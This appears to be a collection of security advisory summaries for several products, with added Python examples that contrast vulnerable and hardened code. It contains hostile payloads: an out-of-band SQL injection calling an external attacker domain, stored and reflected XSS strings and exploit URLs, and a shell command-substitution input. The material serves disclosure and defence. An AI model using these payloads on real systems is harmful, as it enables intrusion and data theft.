A vulnerability in Nacos 2.0.3 allows an attacker to bypass authentication and authorization checks and access the Nacos server without valid credentials. The cause is a flaw in the MyPyJWS class that lets an attacker craft a malicious JWT token which the server accepts as valid; the attacker can then present that token to access the Nacos server.
Windows 11 Pro build 10.0.22000 suffers from a privilege-escalation vulnerability in the Backup service. An attacker who successfully exploits it could gain SYSTEM privileges and could delete data, including data whose loss makes the service unavailable.
The User-Agent HTTP header appears to be vulnerable to SQL injection. The payload '+(select load_file('\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.comquv'))+' was submitted in the User-Agent HTTP header. It injects a SQL sub-query that calls MySQL's load_file function with a UNC file path pointing at an attacker-controlled external domain; a DNS lookup or connection from the database server to that domain confirms the injection out of band even when the response itself shows nothing. An attacker who can inject SQL through this header can read and exfiltrate data from the database and seriously harm the users of this system, for example by extracting the bank account details they use to pay each other.
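The mechanism behind the finding above, as an added example that is not part of the original advisory or of the affected application: a request log that splices the User-Agent header into an INSERT by string concatenation, beside the parameterised form. SQLite is used so it runs offline, so the constructed payload uses SQLite's `||` concatenation operator where the MySQL payload uses `+`, and it reads a row from a constructed `secrets` table instead of calling load_file(); the table names and the payload are assumptions for the demonstration.

```python
import sqlite3

# Constructed User-Agent payload: closes the string literal the logger
# writes, splices in a sub-query, and reopens the literal so the
# statement stays syntactically valid. The MySQL probe in the advisory
# does the same with '+(select load_file(...))+'.
INJECTED_UA = "Mozilla/5.0'||(select token from secrets)||'"


def setup():
    # Constructed schema: one secret the application never intends to log,
    # and the access log that records the User-Agent header.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        create table secrets (token text);
        insert into secrets values ('s3cr3t-token');
        create table access_log (user_agent text);
        """
    )
    return conn


def log_ua_vulnerable(conn, ua):
    # Vulnerable: the header text becomes part of the SQL statement,
    # so the sub-query executes with the logger's privileges.
    conn.execute("insert into access_log(user_agent) values ('" + ua + "')")


def log_ua_safe(conn, ua):
    # Hardened: a bound parameter is stored as an opaque value; the
    # quotes and sub-query never reach the SQL parser.
    conn.execute("insert into access_log(user_agent) values (?)", (ua,))


def last_logged(conn):
    row = conn.execute(
        "select user_agent from access_log order by rowid desc limit 1"
    ).fetchone()
    return row[0]


def demo():
    """Return (what the vulnerable logger stored, what the safe logger stored)."""
    conn = setup()
    log_ua_vulnerable(conn, INJECTED_UA)
    leaked = last_logged(conn)      # secret concatenated into the log row
    log_ua_safe(conn, INJECTED_UA)
    stored = last_logged(conn)      # the payload itself, stored literally
    return leaked, stored


if __name__ == "__main__":
    leaked, stored = demo()
    print("vulnerable logger stored:", leaked)
    print("parameterised logger stored:", stored)
```

In the real finding the sub-query's side effect (the lookup of the attacker's domain) is the signal, which is why an out-of-band probe is used: the logger discards the value, so an in-band payload would show nothing in the response.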
pimcore-5.4.18-skeleton suffers from a Sensitive Cookie with Improper SameSite Attribute vulnerability: the PHPSESSID session cookie is issued without a SameSite attribute, and session management does not re-validate the session or issue a new cookie on each connection (POST request). An attacker on the same network who tricks the administrator and steals this cookie can reuse the same session in the name of the already-authenticated administrator from several machines with different IP addresses on that network, for example logging the user out or performing other malicious actions. This is an elementary developer error and can be very dangerous for the owner of the system. The attack is also possible from an external network.
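As an added example (not pimcore's code), the weak session cookie beside the hardened one, a small audit function for a Set-Cookie header value, and the session-ID rotation the advisory says is missing. It uses only the standard library; the cookie name PHPSESSID comes from the advisory, the session store and the attribute values are assumptions.

```python
from http.cookies import SimpleCookie
import secrets


def build_session_cookie(session_id, hardened=True):
    """Return the Set-Cookie header value for PHPSESSID.

    hardened=False reproduces the weak cookie: only a name, value and path,
    no Secure, HttpOnly or SameSite attribute.
    """
    c = SimpleCookie()
    c["PHPSESSID"] = session_id
    c["PHPSESSID"]["path"] = "/"
    if hardened:
        c["PHPSESSID"]["secure"] = True       # never sent over plain HTTP
        c["PHPSESSID"]["httponly"] = True     # not readable from script
        c["PHPSESSID"]["samesite"] = "Lax"    # not attached to cross-site POSTs
    return c.output(header="").strip()


def audit_set_cookie(header_value):
    """Return the protections missing from a Set-Cookie header value."""
    parts = [p.strip() for p in header_value.split(";")]
    attrs = {}
    for part in parts[1:]:                    # parts[0] is name=value
        key, _, val = part.partition("=")
        attrs[key.lower()] = val
    missing = []
    if "secure" not in attrs:
        missing.append("Secure")
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        missing.append("SameSite=Lax|Strict")
    return missing


def rotate_session(store, old_id):
    """Move the session data under a fresh id and return the new id.

    Called on login and on privilege changes, this defeats session fixation
    and limits how long a stolen id stays valid. `store` is an assumed
    dict-like session store keyed by session id.
    """
    data = store.pop(old_id, {})
    new_id = secrets.token_hex(16)            # 128 bits from the OS CSPRNG
    store[new_id] = data
    return new_id


if __name__ == "__main__":
    weak = build_session_cookie("abc123", hardened=False)
    strong = build_session_cookie("abc123")
    print(weak, "->", audit_set_cookie(weak))
    print(strong, "->", audit_set_cookie(strong))
```

SameSite limits which cross-site requests carry the cookie; it does not stop an attacker who already holds the session ID, which is why Secure (no cleartext exposure) and rotation (short-lived IDs) belong in the same fix.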
This vulnerability requires authentication; however, once the payload is stored, any user visiting the portal will trigger the alert. Log in to the application, browse to the 'Settings' tab and then 'Wards'. Create a new ward with the following payload as the ward name: <script>alert(document.cookie)</script> Any user browsing the application will then trigger the payload.
NetIQ Performance Endpoint <=5.1 is vulnerable to a remote root/SYSTEM exploit. An attacker can send a malicious packet to the vulnerable system and execute arbitrary code with root/SYSTEM privileges.
YUI2 has many reflected XSS vulnerabilities, in most of its files. Each sample URL below passes the URL-encoded payload 1'"()&%<zzz><script>alert("xss")</script> through the mode parameter, which the page reflects without encoding. A sample of the vulnerable files along with the exploit URLs: https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E, https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
AimOne Video Converter V2.04 Build 103 suffers from a buffer overflow that leads to a local denial of service. The registration form does not handle its input properly and crashes the video converter when the user attempts to register the product. The crash can give an attacker a starting point for cracking the software and, depending on the case, further abuse.
This exploit allows an authenticated user to execute arbitrary code on Nexxt Router firmware 42.103.1.5095. It sends a malicious payload to the router's /goform/sysTools endpoint in a POST request whose Authorization header carries the user's base64-encoded credentials; the payload is passed as a parameter in the request body.
Arbitrary bash commands can be run because user-supplied input is placed inside a double-quoted string in the shell command used to log incorrect entries; double quotes do not suppress command substitution ($(...) or backticks), so the input is executed as a command.
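The failure mode described above, as an added example that is not from the original advisory or the affected product: a logger that quotes the rejected entry with double quotes, beside two fixes. `echo` stands in for the real logging command and the payload is constructed; both are assumptions made so the block runs offline on any POSIX shell.

```python
import shlex
import subprocess

# Constructed invalid entry: a command substitution. Inside double quotes
# the shell still runs it; inside single quotes or as an argv element it
# is just text.
PAYLOAD = "$(echo INJECTED)"


def _sh(cmd):
    """Run a shell command line and return its trimmed stdout."""
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def log_bad_entry_vulnerable(entry):
    # Emulates:  logger "Invalid entry: $ENTRY"
    # Double quotes keep spaces together but still expand $(...) and `...`.
    return _sh('echo "Invalid entry: ' + entry + '"')


def log_bad_entry_quoted(entry):
    # Fix 1: shlex.quote() wraps the value in single quotes (escaping any
    # embedded single quote), and nothing inside single quotes is expanded.
    return _sh("echo " + shlex.quote("Invalid entry: " + entry))


def log_bad_entry_argv(entry):
    # Fix 2 (preferred): no shell at all; the entry is one argv element
    # handed straight to the program, so there is no parser to abuse.
    return subprocess.run(
        ["echo", "Invalid entry: " + entry], capture_output=True, text=True
    ).stdout.strip()


if __name__ == "__main__":
    print("vulnerable:", log_bad_entry_vulnerable(PAYLOAD))
    print("quoted:    ", log_bad_entry_quoted(PAYLOAD))
    print("argv:      ", log_bad_entry_argv(PAYLOAD))
```

The vulnerable variant prints `Invalid entry: INJECTED`, showing that the substitution ran; the two fixed variants print the payload literally. The same holds for a backtick payload and for `$VAR` expansion, which is why "put it in double quotes" is never a sufficient fix for shell command injection.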